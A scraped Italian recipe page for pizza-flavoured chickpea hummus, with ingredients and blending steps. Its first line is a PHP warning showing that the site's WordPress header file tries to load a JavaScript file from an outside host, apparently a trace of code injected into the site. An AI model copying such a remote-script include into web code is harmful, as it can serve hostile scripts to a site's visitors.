Warning: file_get_contents(http://get.lightsteper.com/scripts/way.js): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in D:\inetpub\webs\youmumcom\wp-blog-header.php on line 17
Hummus gusto pizza - YouMum

Hummus gusto pizza

Riproduci video

La ricetta più gettonata del medioriente, oggi in una versione made in italy

L’hummus di ceci è un passe-partout per mettere gioia in tavola dalla merenda, all’aperitivo, passando per pic-nic all’aperto e cenette veg.

Una ricetta velocissima che regala vera soddisfazione, soprattutto quando vediamo che i nostri commensali ci intingono dentro carote crude, sedano o finocchi.

Si vince due volte quindi, sia per la praticità di preparazione, sia perché la presenza di un hummus di ceci in tavola richiama naturalmente il consumo di ortaggi freschi.

Oggi esploriamo insieme una versione di questa cremina di ceci conferendole un certo gusto pizza, grazie all’aggiunta di concentrato di pomodoro e origano.

Se stavate cercando la ricetta dell’hummus classica, siete comunque sulla pagina giusta, perché togliendo questi due alimenti, rimangono tutti gli ingredienti dell’hummus tradizionale.

 

Ingredienti
  • 1 ciotola grande di ceci lessati da voi (o 2 barattoli di ceci comprati)
  • 3 cucch. olio evo
  • sale q.b
  • 1 spicchio aglio
  • macinata di pepe
  • succo di mezzo limone
  • 1 cucch. tahina
  • 1 o 2 cucch. concentrato di pomodoro
  • 1 generosa presa di origano

 

Procedimento
  1. Versate in un frullatore i tutti gli ingredienti.
  2. Otterrete una crema morbida e soffice (se troppo asciutta aggiungete un po’ di acqua).
  3. Trasferite in una ciotolina e impreziosite con aromi a piacere (paprika, origano, erba cipollina, prezzemolo, peperoncino)
  4. Per presentarlo ai bambini, potete creare delle facce con verdurine e semi a piacere.

 

PS: Per un risultato da favola, ovvero un hummus di ceci vellutato, il consiglio è di eliminare la pellicina del cece, uno alla volta.

Un supplizio certo se siamo di fretta, come la maggior parte delle volte che cuciniamo, ma potrebbe essere un ottimo spunto per mettere all’opera i nostri bambini e farli collaborare attivamente alla ricetta, concedendoci un momento di pace. 😉

 

Enjoy,

Baci Verdi

Vuoi sorprendere la tua famiglia con ricette nuove, semplici e alternative?

Clicca qui per guardare tutte le ricette